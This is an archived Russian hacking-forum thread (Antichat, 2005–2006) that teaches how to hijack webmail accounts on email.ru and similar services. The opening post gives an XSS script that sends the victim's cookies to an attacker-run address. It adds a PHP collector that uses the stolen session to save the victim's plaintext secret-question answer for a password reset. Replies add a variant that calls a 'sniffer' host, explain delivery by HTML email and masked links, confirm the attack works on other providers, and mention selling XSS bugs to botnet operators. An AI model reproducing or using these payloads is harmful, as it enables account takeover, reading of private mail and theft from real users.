Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Статьи (https://forum.antichat.xyz/forumdisplay.php?f=30)
-   -   Захват ящика на email.ru(aport.ru,omen.ru,atrus.ru,au.ru,imail.ru, aport2000.ru) (https://forum.antichat.xyz/showthread.php?t=5423)

Майор 12.03.2005 22:54
Захват ящика на email.ru(aport.ru,omen.ru,atrus.ru,au.ru,imail.ru, aport2000.ru)
 
Как выяснилось фильтров там вообще никаких нет, ну или покрайне мере я их там не нашёл :)))
Для идентификации пользователей сервер использует id(в переменной cookie) или если id не обноружен, то куки. Причём идентификатор сесии СОВПАДАЕТ с переменной "AGMail" в cookies.
Впринципе нам достаточно получить только куки пользователя и подделов их попасть в его ящик, но это сработате только если пользователь не нажал кнопку "выход"
=> напишем скрипт, который отсылает cookies на скрипт(причём данный скрипт работает не только в IE, но и в других броузерах поддерживающих javascript:
Код:
<script>img=new Image();img.src='http://adres_scripta.php?'+document.cookie;</script>
Поскольку ответ на секретный вопрос храниться в открытом виде, напишем ещё один скрипт на php, который сохраняет нам страницу "Информация о пользователе" где он и присутствует:
PHP код:
<?
$nachalo=strpos("$QUERY_STRING","AGMail=")+7// ищем номер позиции с которой начинается cookie
$cooka=substr("$QUERY_STRING","$nachalo"); // сохраняем cookie в переменную $cooka
$p=join('',file("http://email.ru/scripts/options?user=1&site=rol&cookie={$cooka}")); // читаем информацию о пользователе и загоняем её в переменную $p
$f=Fopen("./{$cooka}.html","w") or die("ale!!!!!!!!!"); // открывает канал для записи
fputs($f,$p); // записываем переменную $p
fputs($f,$QUERY_STRING); // на странице "Информация о пользователе" нет адреса жертвы, но он есть в куках, потому также запишим их в этот фал на всякий случай :)
fclose($f); // закрываем канал
?>
Потом идём вместе с секретным вопросом и меняем пароль на мыло !
P.S. По этому же принцепу можно читать чужую почту, записав свой адрес на перенапрвыление почты...

rsha1988 13.03.2005 02:05
1 чето не сработало!
а в 2 как применить?
Просто отправить по почте или на сайт загрузить?

Майор 13.03.2005 02:09
Цитата:
Сообщение от rsha1988
1 чето не сработало!
а в 2 как применить?
Просто отправить по почте или на сайт загрузить?
Первый скрипт от правляешь по почте в виде html письма
Второй заливаешь на сайт(бесплатный хостинг не подойдёт так как там запрешены исходяшие линки)

rsha1988 13.03.2005 03:33
1 я понял (я думал на mail.ru это работает )) )!
А вот 2 чето не понятно...
$p=join - это ник чтоли?
user=1 - и как я узнаю ид мыла...

Майор 13.03.2005 13:42
Цитата:
Сообщение от rsha1988
1 я понял (я думал на mail.ru это работает )) )!
А вот 2 чето не понятно...
$p=join - это ник чтоли?
user=1 - и как я узнаю ид мыла...
&cookie={$cooka} - эт ид
$p=join - это функция которая читает страницу

Glyuk 13.03.2005 22:16
Красавец! Но на mail.ru тэг <script> фильтруется и заменяется на <xscript>... так что думаем дальше...

lexa 14.03.2005 19:08
вообще для mail.ru , просто посылаещь http://antichat.ru/cgi-bin/s.jpg? и ждещь когда зайдут по этой ссылке , и на снифе появиться сесия атакуемого , просто вставляешь идешь по его ссылке (что в снифере появилась ) и все ты у него на почте ":))
конечно это наверно все знают .....

а вот офигенный сайтик http://unknown-.chat.ru/page5.html прочтите ":))

lexa 14.03.2005 19:23
да, и ссылку можно замаскировать , просто он открывает письмо и она само срабатывает

Lost Viking 15.03.2005 18:22
Грандиозно! Действительно работает! Изыскателю - Огромный респект!
 
Попробовал на своём почтовом ящике, и получил к нему доступ... вот ведь теперь бояться надо себя! :cool:

С уважением,
Илья.

sl_play 17.03.2005 11:18
Я считаю, что даная статья является заблуждением её автора.
Каждый сайт оставляет на "машинах" пользователей свои кукисы, тоесть: если мы на сайте вставляем строку alert(document.cookie) мы увидим кукисы те, которые мы сами туда записали, а отнюдь не кукисы с сайта почтовой системы. Данная статья будет актуальна и функциональна в случае, если эта строка, укзананная в статье: "<script>img=new Image();img.src='http://adres_scripta.php?'+document.cookie;</script>" записана в страницу почтовой системы. Если Вы вставили эту строку в свой сайт и надеетесь таким путём прочесть кукис, который сохранила одна из почтовых систем, то у Вас конечно же ничего не выйдет. Таким образом вы всего лишь прочтёте кукисы, которые сами впихнули юзверю. Надеюсь моя мысль понятна.

sl_play 17.03.2005 12:24
я писал ранее о неработоспособности данного примера.
Приношу свои извинения авторам и сайту.
Я увидел на одном из сайтов в инете этот пример просто вставленный в штмл, именно это и ввело меня в заблуждение.
Ещё раз сорри!

Майор 17.03.2005 17:58
PS Наглядным примером работы почтовой системы вообще без куков, является почта на e-mail.ru

rsha1988 27.03.2005 15:27
На:
pochta.ru, front.ru, fromru.com, hotbox.ru, krovatka.net, land.ru, mail15.com, mail333.com, pisem.net, pochtamt.ru, pop3.ru, rbcmail.ru, smtp.ru 1`й вариант тоже работает)))

Майор 27.03.2005 23:07
Цитата:
Сообщение от rsha1988
На:
pochta.ru, front.ru, fromru.com, hotbox.ru, krovatka.net, land.ru, mail15.com, mail333.com, pisem.net, pochtamt.ru, pop3.ru, rbcmail.ru, smtp.ru 1`й вариант тоже работает)))
нууу, нет конешно, там как минимум надо хеш-пароль иметь чтоб этим воспользоваться

rsha1988 28.03.2005 01:50
Цитата:
Сообщение от Майор
нууу, нет конешно, там как минимум надо хеш-пароль иметь чтоб этим воспользоваться
Не, попробуй отправить письмо с вложеным html документом в котором будит этот код:
<img src="javascript:img=new Image();img.src='http://сниффер/me.jpg?cooki='+escape(document.cookie)">
Правда есть минус один - как только юзверь из почты выходит все накрываеться(((

Майор 28.03.2005 11:45
Цитата:
Сообщение от rsha1988
Не, попробуй отправить письмо с вложеным html документом в котором будит этот код:
<img src="javascript:img=new Image();img.src='http://сниффер/me.jpg?cooki='+escape(document.cookie)">
Правда есть минус один - как только юзверь из почты выходит все накрываеться(((
это почти на всех почтах так...., этож не зават ящика ..

firreli 21.04.2005 17:55
pojaluysta podrobney opishite na schet pervogo primere na mail.ru
zaranye pasiba

BNF 16.05.2005 01:36
слушайте, а насколько актуальна статья в настоящее время?
имею ввиду дырки эти уже прикрыли??

SanyaX 18.01.2006 13:21
Это ыт уже заебал на флудил нету ХСС на маил.ру а тем более для тебя! Если ты спрашиваешь как закодировать код. То я не думаю что ты ХСС нашёл.

SanyaX 18.01.2006 13:22
А так же могу сказать но не точно ХСС на маил.ру за стоко не продаётся! Она стоит чуть ли не 100 баксов. Так что я тебе не верю.

ZaCo 18.01.2006 17:11
2SanyaX ты чего какой сто баксов?? мну стал бы богатым+))))) :D за бесплатно могу в общаг вынести ;) (чтоб все не думали - бага отличается от той что нашел Dronga поэтому моя гыгы)
pantilxaker расслабься - для этого есть раздел обьявления
---
ЗЫ LittleLamer выкладывал в общаг хсс на яндесе чуется стоит не меньше а ведь выложил+)

PinkPanther 28.01.2006 03:13
Цитата:
Сообщение от ZaCo
ЗЫ LittleLamer выкладывал в общаг хсс на яндесе чуется стоит не меньше а ведь выложил+)
Не, просто это Че с похмелья чистил ГМ и случайно переместил. )
А насчет XSS, поверь, Я общался с чеоловеком, который их сборщикам ботнетов по 50 баксов толкал. Само собой это был необычный пассиы хрен знает где.

dinar_007 28.01.2006 13:18
Не надо на майл.ру Xss на паблик ложить... Ато пофиксят имхо (((

P.s. Розовая Пантера, уменьши подпись )))

NOmeR1 14.06.2006 19:49
Люди, а этот трюк действует на народе (жертва@yandex.ru, жертва@ya.ru, жертва@narod.ru)?
:)
-----------
люди, я чёто не понял, куда сохраняются куки? :confused:

+toxa+ 15.06.2006 00:28
Нет, на яндексе фильтры....

NOmeR1 15.06.2006 15:23
А куда куки сохраняются?

Otaku 15.06.2006 17:20
Упёртые?
На сниффер приходят.

NOmeR1 15.06.2006 18:50
Я чёто не заметил в скрипте ссылку на сниффер.


Время: 14:43